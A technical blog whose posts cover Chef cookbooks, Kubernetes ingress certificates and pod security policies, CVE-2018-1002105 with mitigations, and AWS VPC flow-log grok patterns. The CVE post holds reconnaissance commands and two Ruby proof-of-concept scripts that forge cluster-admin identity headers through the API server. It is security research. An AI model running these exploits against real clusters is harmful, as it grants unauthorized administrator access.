Sunday, September 15, 2019

Testing/Writing Chef Cookbooks



Writing cookbooks

A cookbook contains attributes, recipes, templates, etc.


Using Community cookbooks
  1. Modify the Berksfile in the cookbook by adding the cookbook name, e.g. cookbook 'yum-centos', '~> 3.0.0'
  2. Modify metadata.rb in the cookbook by updating its dependencies, e.g. depends 'yum-centos', '~> 3.0.0'
  3. Execute the commands below
$ berks install
$ berks upload
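Steps 1 and 2 above amount to edits like the sketch below (the cookbook name my_cookbook is a hypothetical placeholder; the yum-centos pin comes from the example above):

```ruby
# Berksfile -- pulls dependencies from the public Supermarket
source 'https://supermarket.chef.io'

metadata                                # resolve deps declared in metadata.rb
cookbook 'yum-centos', '~> 3.0.0'       # community cookbook added in step 1
```

```ruby
# metadata.rb
name 'my_cookbook'                      # hypothetical cookbook name
version '0.1.0'

depends 'yum-centos', '~> 3.0.0'        # dependency added in step 2
```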
Prerequisites

Make sure the following configs/files are in place
  • Chef cookbook
  • Chef Environment
  • Chef Role
Testing cookbook locally

  1. Install vagrant from https://www.vagrantup.com/downloads.html
  2. Install Virtualbox
  3. Modify the .kitchen.yml file to reference the community cookbook recipe you want to test locally.
  4. Go to the cookbook directory and execute kitchen commands to build, list, and log in to the newly created resource from the chef cookbooks.
$ kitchen converge
$ kitchen list
$ kitchen login
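A minimal .kitchen.yml for this setup might look like the sketch below (platform and suite names are assumptions; point run_list at the recipe you actually want to test):

```yaml
---
driver:
  name: vagrant            # uses the Vagrant/VirtualBox install from steps 1-2

provisioner:
  name: chef_zero

platforms:
  - name: centos-7         # assumed platform; any Vagrant box works

suites:
  - name: default
    run_list:
      - recipe[yum-centos::default]   # community recipe under test (assumed)
    attributes: {}
```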
Update authentication key
# Connect to chef server 
[pd@ip-disects ~]$ ssh -A -t SSH_SERVER_IP 

# Following commands are executed on chef server 
[pd@ip-disects ~]$ sudo chef-server-ctl user-create praveend Praveen Darshanam praveend@chef.io Myp@ssw0rd -f /tmp/praveend.key 
ERROR: Conflict 
Response: Username or email address already in use. 

[pd@ip-disects ~]$ sudo chef-server-ctl user-delete praveend 
Do you want to delete the user praveend? (Y/N) y 
Checking organization memberships... 
Checking admin group memberships for 1 org(s). 
FATAL: praveend is in the 'admins' group of the following organization(s): 
- disects



Run this command again with the --remove-from-admin-groups option to remove the user from these admin group(s) automatically. 
[pd@ip-disects ~]$ sudo chef-server-ctl user-delete praveend --remove-from-admin-groups 
Do you want to delete the user praveend? (Y/N) y 
Checking organization memberships... 
Checking admin group memberships for 1 org(s). 
Removing praveend from admins group of 'disects' 
Deleting user praveend. 

[pd@ip-disects ~]$ sudo chef-server-ctl user-create praveend Praveen Darshanam praveend@chef.io Myp@ssw0rd -f /tmp/praveend.key 
[pd@ip-disects ~]$ sudo chef-server-ctl org-user-add disects praveend --admin 
User praveend is added to admins and billing-admins group


After local testing, upload the working cookbook to the chef server. Test the cookbook on a cluster node to make sure everything is working fine; this needs some experience, though.
$ knife cookbook upload cookbook_name


Kubernetes ingress custom Certificates with valid CA



Irrespective of the ingress FQDN, Kubernetes creates certificates with the domain name ingress.local, which causes the issues below.
  • CoreOS Dex needs certificates from a valid CA; self-signed certificates will not work
  • Gardener dashboard authentication has issues with self-signed certificates; the AuthN flow will not complete without accepting the invalid-certificate error
  • Accessing the ingress in any browser raises a self-signed certificate warning

Fix: Let's Encrypt


Install Certbot from Let's Encrypt
$ brew install certbot

Create a wildcard certificate for the domain *.pd.example.com

Before entering Yes to confirm, make sure you add the TXT record entry as prompted by certbot.
# create directories named le_wd, le_cd, le_ld before executing below command
$ certbot certonly --manual -d *.pd.example.com  --work-dir=le_wd --config-dir=le_cd --logs-dir=le_ld 

# Check if certificates are created
$ certbot certificates --work-dir=le_wd --config-dir=le_cd --logs-dir=le_ld

Certs are located at le_cd/live/pd.example.com/


Create secret with the Certificates we want to use
$ kubectl create secret tls pd-custom-certs --key pd.example.com.key --cert pd.example.com.crt -n namespace_of_interest


Configure ingress with the TLS secret.
----SNIP(FQDN 1)----
ingress:
  enabled: true
  path: /
  hosts:
    - a.pd.example.com
  tls:
    - hosts:
        - a.pd.example.com
      secretName: pd-custom-certs
----SNIP(FQDN 2)----
ingress:
  enabled: true
  path: /
  hosts:
    - b.pd.example.com
  tls:
    - secretName: pd-custom-certs
      hosts:
        - b.pd.example.com

Accessing ingress should not show invalid Cert errors now.

Kubernetes Pod Security Policies



Start minikube with RBAC and admission-plugins enabled
$ minikube start --extra-config=apiserver.authorization-mode=Node,RBAC --extra-config=apiserver.enable-admission-plugins=PodSecurityPolicy
# or
$ minikube start --extra-config=apiserver.authorization-mode=Node,RBAC --extra-config=apiserver.Admission.PluginNames=PodSecurityPolicy

These commands did not work on my Mac machine; it looks like an API Server issue, as the server is not accepting any requests (it might not be up).

Create namespace and Service Account
$ kubectl create namespace praveend-psp
$ kubectl create sa test-psp-sa -n praveend-psp

Policy definitions
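As a starting point, a restrictive policy definition could look like the sketch below (the policy name is an assumption; tighten or loosen fields to match your requirements):

```yaml
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: test-psp                   # assumed policy name
spec:
  privileged: false                # disallow privileged containers
  allowPrivilegeEscalation: false
  runAsUser:
    rule: MustRunAsNonRoot         # containers must not run as root
  seLinux:
    rule: RunAsAny
  supplementalGroups:
    rule: RunAsAny
  fsGroup:
    rule: RunAsAny
  volumes:                         # only allow a safe subset of volume types
    - configMap
    - secret
    - emptyDir
```

The policy must then be granted to the service account (e.g. via a Role/RoleBinding allowing the `use` verb on this PSP) before pods in the namespace can be admitted.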

Friday, December 21, 2018

Exploiting Kubernetes Privilege Escalation (CVE-2018-1002105)

According to the GitHub vulnerability page [02], it can be exploited in two ways
  • Aggregated API servers configured
  • Granted Pod attach/exec/portforward permissions

Aggregated API Servers

List of aggregated API servers configured in the cluster

$ kubectl get apiservices -o 'jsonpath={range .items[?(@.spec.service.name!="")]}{.metadata.name}{"\n"}{end}'
v1beta1.metrics.k8s.io
v1beta1.servicecatalog.k8s.io

Most of the time the metrics aggregation service comes from vendors and is installed by default on Kubernetes clusters. Service Catalog is installed by cluster admins based on requirements.

Metrics server details

$ kubectl get apiservices v1beta1.metrics.k8s.io -o json
{
    "apiVersion": "apiregistration.k8s.io/v1",
    "kind": "APIService",
    "metadata": {
        "annotations": {
            "kubectl.kubernetes.io/last-applied-configuration": "{\"apiVersion\":\"apiregistration.k8s.io/v1beta1\",\"kind\":\"APIService\",\"metadata\":{\"annotations\":{},\"labels\":{\"addonmanager.kubernetes.io/mode\":\"Reconcile\",\"kubernetes.io/minikube-addons\":\"metrics-server\"},\"name\":\"v1beta1.metrics.k8s.io\",\"namespace\":\"\"},\"spec\":{\"group\":\"metrics.k8s.io\",\"groupPriorityMinimum\":100,\"insecureSkipTLSVerify\":true,\"service\":{\"name\":\"metrics-server\",\"namespace\":\"kube-system\"},\"version\":\"v1beta1\",\"versionPriority\":100}}\n"
        },
        "creationTimestamp": "2018-12-18T21:52:00Z",
        "labels": {
            "addonmanager.kubernetes.io/mode": "Reconcile",
            "kubernetes.io/minikube-addons": "metrics-server"
        },
        "name": "v1beta1.metrics.k8s.io",
        "resourceVersion": "13945",
        "selfLink": "/apis/apiregistration.k8s.io/v1/apiservices/v1beta1.metrics.k8s.io",
        "uid": "25c4530a-030f-11e9-8cd1-0800276668cf"
    },
    "spec": {
        "caBundle": null,
        "group": "metrics.k8s.io",
        "groupPriorityMinimum": 100,
        "insecureSkipTLSVerify": true,
        "service": {
            "name": "metrics-server",
            "namespace": "kube-system"
        },
        "version": "v1beta1",
        "versionPriority": 100
    },
    "status": {
        "conditions": [
            {
                "lastTransitionTime": "2018-12-19T20:25:23Z",
                "message": "all checks passed",
                "reason": "Passed",
                "status": "True",
                "type": "Available"
            }
        ]
    }
}

Catalog server details

$ kubectl get apiservices v1beta1.servicecatalog.k8s.io -o json
{
    "apiVersion": "apiregistration.k8s.io/v1",
    "kind": "APIService",
    "metadata": {
        "creationTimestamp": "2018-12-19T21:47:13Z",
        "name": "v1beta1.servicecatalog.k8s.io",
        "resourceVersion": "16958",
        "selfLink": "/apis/apiregistration.k8s.io/v1/apiservices/v1beta1.servicecatalog.k8s.io",
        "uid": "a5162df4-03d7-11e9-b1ef-0800276668cf"
    },
    "spec": {
        "caBundle": "LS0tLS1...URS0tLS0tCg==",
        "group": "servicecatalog.k8s.io",
        "groupPriorityMinimum": 10000,
        "service": {
            "name": "catalog-catalog-apiserver",
            "namespace": "catalog"
        },
        "version": "v1beta1",
        "versionPriority": 20
    },
    "status": {
        "conditions": [
            {
                "lastTransitionTime": "2018-12-19T21:48:27Z",
                "message": "all checks passed",
                "reason": "Passed",
                "status": "True",
                "type": "Available"
            }
        ]
    }
}


Resources under different aggregated APIs

$ kubectl api-resources | grep -i garden.sapcloud.io
backupinfrastructures             backupinfra   garden.sapcloud.io             true         BackupInfrastructure
cloudprofiles                                   garden.sapcloud.io             false        CloudProfile
projects                                        garden.sapcloud.io             false        Project
quotas                            squota        garden.sapcloud.io             true         Quota
secretbindings                    sb            garden.sapcloud.io             true         SecretBinding
seeds                                           garden.sapcloud.io             false        Seed
shoots                                          garden.sapcloud.io             true         Shoot

$ kubectl api-resources | grep -i metrics.k8s.io
nodes                                           metrics.k8s.io                 false        NodeMetrics
pods                                            metrics.k8s.io                 true         PodMetrics

$ kubectl api-resources | grep -iE "servicecatalog.k8s.io|namespace"
NAME                              SHORTNAMES   APIGROUP                       NAMESPACED   KIND
clusterservicebrokers                          servicecatalog.k8s.io          false        ClusterServiceBroker
clusterserviceclasses                          servicecatalog.k8s.io          false        ClusterServiceClass
clusterserviceplans                            servicecatalog.k8s.io          false        ClusterServicePlan
servicebindings                                servicecatalog.k8s.io          true         ServiceBinding
servicebrokers                                 servicecatalog.k8s.io          true         ServiceBroker
serviceclasses                                 servicecatalog.k8s.io          true         ServiceClass
serviceinstances                               servicecatalog.k8s.io          true         ServiceInstance
serviceplans                                   servicecatalog.k8s.io          true         ServicePlan

According to Kubernetes Github vulnerability description:
With a specially crafted request, users that are authorized to establish a connection through the Kubernetes API server to a backend server can then send arbitrary requests over the same connection directly to that backend, authenticated with the Kubernetes API server’s TLS credentials used to establish the backend connection.

Service Accounts/Users

Default service-accounts inside a kubernetes cluster
$ kubectl get sa --all-namespaces
NAMESPACE     NAME                                 SECRETS   AGE
catalog       default                              1         1h
catalog       service-catalog-apiserver            1         1h
catalog       service-catalog-controller-manager   1         1h
default       default                              1         1d
kube-public   default                              1         1d
kube-system   attachdetach-controller              1         1d
kube-system   bootstrap-signer                     1         1d
kube-system   certificate-controller               1         1d
kube-system   clusterrole-aggregation-controller   1         1d
kube-system   cronjob-controller                   1         1d
kube-system   daemon-set-controller                1         1d
kube-system   default                              1         1d
kube-system   deployment-controller                1         1d
kube-system   disruption-controller                1         1d
kube-system   endpoint-controller                  1         1d
kube-system   generic-garbage-collector            1         1d
kube-system   horizontal-pod-autoscaler            1         1d
kube-system   job-controller                       1         1d
kube-system   kube-dns                             1         1d
kube-system   kube-proxy                           1         1d
kube-system   namespace-controller                 1         1d
kube-system   nginx-ingress                        1         1d
kube-system   node-controller                      1         1d
kube-system   persistent-volume-binder             1         1d
kube-system   pod-garbage-collector                1         1d
kube-system   pv-protection-controller             1         1d
kube-system   pvc-protection-controller            1         1d
kube-system   replicaset-controller                1         1d
kube-system   replication-controller               1         1d
kube-system   resourcequota-controller             1         1d
kube-system   service-account-controller           1         1d
kube-system   service-controller                   1         1d
kube-system   statefulset-controller               1         1d
kube-system   storage-provisioner                  1         1d
kube-system   token-cleaner                        1         1d
kube-system   ttl-controller                       1         1d
pd            default                              1         1d

These service accounts can also be referenced in the form
system:serviceaccount:my-namespace:my-serviceaccount-name
for example system:serviceaccount:kube-system:horizontal-pod-autoscaler


Permissions

Check what permissions a service account has
$ kubectl auth can-i create pods --all-namespaces
yes
$ kubectl auth can-i create pods --all-namespaces --as system:serviceaccount:kube-system:horizontal-pod-autoscaler
no
$ kubectl auth can-i create pods --all-namespaces --as system:serviceaccount:kube-system:default
yes
$ kubectl auth can-i exec pods --all-namespaces --as system:serviceaccount:catalog:service-catalog-controller-manager
no
$ kubectl auth can-i exec pods --all-namespaces --as system:serviceaccount:kube-system:default
yes


API Server

API Server admission controller parameters
$ kubectl get po kube-apiserver-minikube -n kube-system -o yaml
....
spec:
  containers:
  - command:
    - kube-apiserver
    - --admission-control=Initializers,NamespaceLifecycle,LimitRanger,ServiceAccount,DefaultStorageClass,DefaultTolerationSeconds,NodeRestriction,MutatingAdmissionWebhook,ValidatingAdmissionWebhook,ResourceQuota
    - --insecure-port=0
    - --requestheader-group-headers=X-Remote-Group
    - --requestheader-extra-headers-prefix=X-Remote-Extra-
    - --client-ca-file=/var/lib/minikube/certs/ca.crt
    - --tls-cert-file=/var/lib/minikube/certs/apiserver.crt
    - --kubelet-client-key=/var/lib/minikube/certs/apiserver-kubelet-client.key
    - --proxy-client-cert-file=/var/lib/minikube/certs/front-proxy-client.crt
    - --proxy-client-key-file=/var/lib/minikube/certs/front-proxy-client.key
    - --secure-port=8443
    - --enable-bootstrap-token-auth=true
    - --kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname
    - --requestheader-username-headers=X-Remote-User
    - --service-account-key-file=/var/lib/minikube/certs/sa.pub
    - --requestheader-client-ca-file=/var/lib/minikube/certs/front-proxy-ca.crt
    - --allow-privileged=true
    - --requestheader-allowed-names=front-proxy-client
    - --advertise-address=192.168.99.100
    - --service-cluster-ip-range=10.96.0.0/12
    - --tls-private-key-file=/var/lib/minikube/certs/apiserver.key
    - --kubelet-client-certificate=/var/lib/minikube/certs/apiserver-kubelet-client.crt
    - --authorization-mode=Node,RBAC
    - --etcd-servers=https://127.0.0.1:2379
    - --etcd-cafile=/var/lib/minikube/certs/etcd/ca.crt
    - --etcd-certfile=/var/lib/minikube/certs/apiserver-etcd-client.crt
    - --etcd-keyfile=/var/lib/minikube/certs/apiserver-etcd-client.key

To find out the cluster's API Server details
$ kubectl cluster-info
Kubernetes master is running at https://192.168.99.100:8443
KubeDNS is running at https://192.168.99.100:8443/api/v1/namespaces/kube-system/services/kube-dns:dns/proxy


PoC/Exploit

There are two exploits available in the wild based on "Aggregated API Servers"; no PoCs were found leveraging "Grant Pod attach/exec/portforward permissions".


Exploit 1: source [03]

#!/usr/bin/env ruby

require 'socket'
require 'openssl'
require 'json'

host = 'kubernetes'
metrics = '/apis/metrics.k8s.io/v1beta1'

sock = TCPSocket.new host, 8443
ssl = OpenSSL::SSL::SSLSocket.new sock
ssl.sync_close = true
ssl.connect

ssl.puts "GET #{metrics} HTTP/1.1\r\nHost: #{host}\r\nUpgrade: WebSocket\r\nConnection: upgrade\r\n\r\n"
6.times { puts ssl.gets }
ssl.puts "GET #{metrics}/pods HTTP/1.1\r\nHost: #{host}\r\nX-Remote-User: system:serviceaccount:kube-system:horizontal-pod-autoscaler\r\n\r\n"
6.times { puts ssl.gets }

puts JSON.pretty_generate JSON.parse ssl.gets
ssl.close




Exploit 2: based on [04]

#!/usr/bin/env ruby

require 'socket'
require 'openssl'
require 'json'

host = 'kubernetes'
scatalog = '/apis/servicecatalog.k8s.io'

sock = TCPSocket.new host, 8443
ssl = OpenSSL::SSL::SSLSocket.new sock
ssl.sync_close = true
ssl.connect

ssl.puts "GET #{scatalog} HTTP/1.1\r\nHost: #{host}\r\nUpgrade: WebSocket\r\nConnection: upgrade\r\n\r\n"
6.times { puts ssl.gets }
ssl.puts "GET #{scatalog}/clusterservicebrokers HTTP/1.1\r\nHost: #{host}\r\nX-Remote-User: cluster-admin\r\nX-Remote-Group: system:masters\r\nX-Remote-Group: system:authenticated\r\n\r\n"

6.times { puts ssl.gets }

puts JSON.pretty_generate JSON.parse ssl.gets
ssl.close

References

[01] http://blog.disects.com/2018/12/kubernetes-privilege-escalation-cve.html
[02] https://github.com/kubernetes/kubernetes/issues/71411
[03] https://www.twistlock.com/labs-blog/demystifying-kubernetes-cve-2018-1002105-dead-simple-exploit/
[04] https://github.com/evict/poc_CVE-2018-1002105

Friday, December 7, 2018

Kubernetes Privilege Escalation (CVE-2018-1002105)

Introduction

Kubernetes is an open source, production-grade container orchestration system for deploying and managing docker/container applications. There are managed Kubernetes orchestration service providers such as Amazon Elastic Container Service for Kubernetes (EKS), Azure Kubernetes Service (AKS), etc.

kubectl

Kubernetes cluster users can perform management tasks using the kubectl binary, which talks to the API Server. Example kubectl commands

# display pod resource
kubectl get pods -n my_namespace

# Execute a command in a container
kubectl -n my_namespace exec -it pods_name -- sh


# Listen on ports 5000 and 6000 locally, forwarding data to/from ports 5000 and 6000 in the pod
kubectl -n my_namespace port-forward pod/mypod 5000 6000

# Get output from ruby-container from pod my-pod-pd
kubectl attach my-pod-pd -c ruby-container


kubectl execution flow (source: 1ambda.github.io)


kubelet

kubelet and kube-proxy run on each compute node (VM, worker, EC2 instance, etc.); kubelet listens on TCP ports 10250 and 10255 (with no authentication/authorization). The API Server acts as a reverse proxy to the kubelet and to aggregated APIs. The API Server connects to the kubelet to fulfill commands like exec and port-forward, and opens a websocket connection which connects stdin, stdout, or stderr to the user's original call [01].

API Aggregation

Installing or writing additional APIs into the Kubernetes API Server, i.e. extending the core API Server
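An aggregated API is registered with an APIService object pointing the API Server at a backend Service; a minimal sketch (group, version, and service names here are hypothetical):

```yaml
apiVersion: apiregistration.k8s.io/v1
kind: APIService
metadata:
  name: v1beta1.example.pd.io        # hypothetical group/version
spec:
  group: example.pd.io
  version: v1beta1
  service:
    name: example-apiserver          # backend Service serving the extra API
    namespace: kube-system
  groupPriorityMinimum: 100
  versionPriority: 100
  insecureSkipTLSVerify: true        # avoid in production; set caBundle instead
```

Requests under /apis/example.pd.io/v1beta1 are then proxied by the core API Server to that backend, which is exactly the proxy path the vulnerability below abuses.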

Vulnerability

The vulnerability is in the Kubernetes API Server: a crafted request can execute arbitrary commands on the backend servers (pods) through the same channel the client established to the backend through the API Server [02]

Check nodes Kubernetes version
$ kubectl get nodes -o wide
NAME        STATUS ROLES AGE VERSION INTERNAL-IP EXTERNAL-IP OS-IMAGE KERNEL-VERSION CONTAINER-RUNTIME
pd-worker-01 Ready node 13d v1.12.3 10.250.0.6 Container Linux by CoreOS 1745.7.0 (Rhyolite) 4.14.48-coreos-r2 docker://18.3.1
pd-worker-02 Ready node 13d v1.12.3 10.250.0.5 Container Linux by CoreOS 1745.7.0 (Rhyolite) 4.14.48-coreos-r2 docker://18.3.1
pd-worker-03 Ready node 13d v1.12.3 10.250.0.4 Container Linux by CoreOS 1745.7.0 (Rhyolite) 4.14.48-coreos-r2 docker://18.3.1


Vulnerable API Servers

If the API server response looks like the one below and the cluster runs a vulnerable Kubernetes version, you are exposed to the anonymous-user escalation; patch Kubernetes immediately.
HTTP response code 403 means Forbidden, i.e. an authorization failure, which implies the request successfully passed the authentication phase.
{
    "kind": "Status",
    "apiVersion": "v1",
    "metadata": {},
    "status": "Failure",
    "message": "forbidden: User \"system:anonymous\" cannot get path \"/api/v1/\"",
    "reason": "Forbidden",
    "details": {},
    "code": 403
}


anonymous user

By default, requests to the kubelet’s HTTPS endpoint that are not rejected by other configured authentication methods are treated as anonymous requests, and given a username of system:anonymous and a group of system:unauthenticated.

Mitigations

There are three levels of escalation mitigations

1. anonymous user -> aggregated API server

Verify the API Server flag anonymous-auth is set to false
$ kubectl get po kube-apiserver-01 -n prod -o yaml | grep -i "anonymous-auth"
    - --anonymous-auth=false
$ kubectl get po kube-apiserver-01 -n stage -o yaml | grep -i "anonymous-auth"
    - --anonymous-auth=false


2. authenticated user -> aggregated API server

Suspend aggregated API servers usage


3. authorized pod exec/attach/portforward -> kubelet API

Remove pod exec/attach/portforward permissions for users


References

[01]. https://docs.openshift.com/container-platform/3.11/architecture/networking/remote_commands.html
[02]. https://docs.openshift.com/container-platform/3.11/architecture/networking/remote_commands.html
[03]. https://elastisys.com/2018/12/04/kubernetes-critical-security-flaw-cve-2018-1002105/
[04]. https://github.com/kubernetes/kubernetes/issues/71411



Saturday, January 20, 2018

AWS VPC Flow Logs grok Pattern


Amazon Web Services (AWS) can generate VPC flow logs, in the format below
2 123456789010 eni-abc123de 172.31.9.69 172.31.9.12 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK

For more information on flow logs and the grok filter plugin, refer to the links below
https://docs.aws.amazon.com/AmazonVPC/latest/UserGuide/flow-logs.html
https://www.elastic.co/guide/en/logstash/current/plugins-filters-grok.html

grok patterns can be tested using the links below
http://grokdebug.herokuapp.com
http://grokconstructor.appspot.com/do/match#result

%{NONNEGINT:version} %{NONNEGINT:accountid} %{NOTSPACE:interface-id} %{NOTSPACE:srcaddr} %{NOTSPACE:dstaddr} %{NONNEGINT:srcport} %{NONNEGINT:dstport} %{NONNEGINT:protocol} %{NONNEGINT:packets} %{NONNEGINT:bytes} %{NONNEGINT:starttime} %{NONNEGINT:endtime} %{NOTSPACE:action} %{NOTSPACE:log-status}

Test using grokdebugger

Test using grokconstructor

You can also consider INT instead of NONNEGINT
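As a rough offline sanity check, the grok pattern above can be approximated with a plain regex; the sketch below uses Python (an assumption, not part of the logstash pipeline), mapping NONNEGINT to \d+ and NOTSPACE to \S+ (field names use underscores because hyphens are not valid in regex group names):

```python
import re

# One (name, sub-pattern) pair per grok field, in flow-log order.
FIELDS = [
    ("version", r"\d+"), ("accountid", r"\d+"), ("interface_id", r"\S+"),
    ("srcaddr", r"\S+"), ("dstaddr", r"\S+"), ("srcport", r"\d+"),
    ("dstport", r"\d+"), ("protocol", r"\d+"), ("packets", r"\d+"),
    ("bytes", r"\d+"), ("starttime", r"\d+"), ("endtime", r"\d+"),
    ("action", r"\S+"), ("log_status", r"\S+"),
]
PATTERN = re.compile(" ".join(f"(?P<{n}>{p})" for n, p in FIELDS))

def parse_flow_log(line):
    """Return a dict of flow-log fields, or None if the line doesn't match."""
    m = PATTERN.match(line)
    return m.groupdict() if m else None

# The sample record from the AWS documentation quoted above.
sample = ("2 123456789010 eni-abc123de 172.31.9.69 172.31.9.12 "
          "49761 3389 6 20 4249 1418530010 1418530070 REJECT OK")
print(parse_flow_log(sample)["action"])  # REJECT
```

This only checks the field layout; logstash-specific behavior like the :int type casts still needs testing in grok itself.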


A few patterns found by googling looked like the one below, but they did not work on the grokconstructor website.
%{NUMBER:version} %{NUMBER:account-id} %{NOTSPACE:interface-id} %{NOTSPACE:srcaddr} %{NOTSPACE:dstaddr} %{NOTSPACE:srcport:int} %{NOTSPACE:dstport:int} %{NOTSPACE:protocol:int} %{NOTSPACE:packets:int} %{NOTSPACE:bytes:int} %{NUMBER:start:int} %{NUMBER:end:int} %{NOTSPACE:action} %{NOTSPACE:log-status}

Tested on grokdebugger


Tested on grokconstructor

We can use the fields extracted by the grok filter plugin in Kibana searches, or enrich the data using logstash filter plugins such as geoip, dns, date, etc.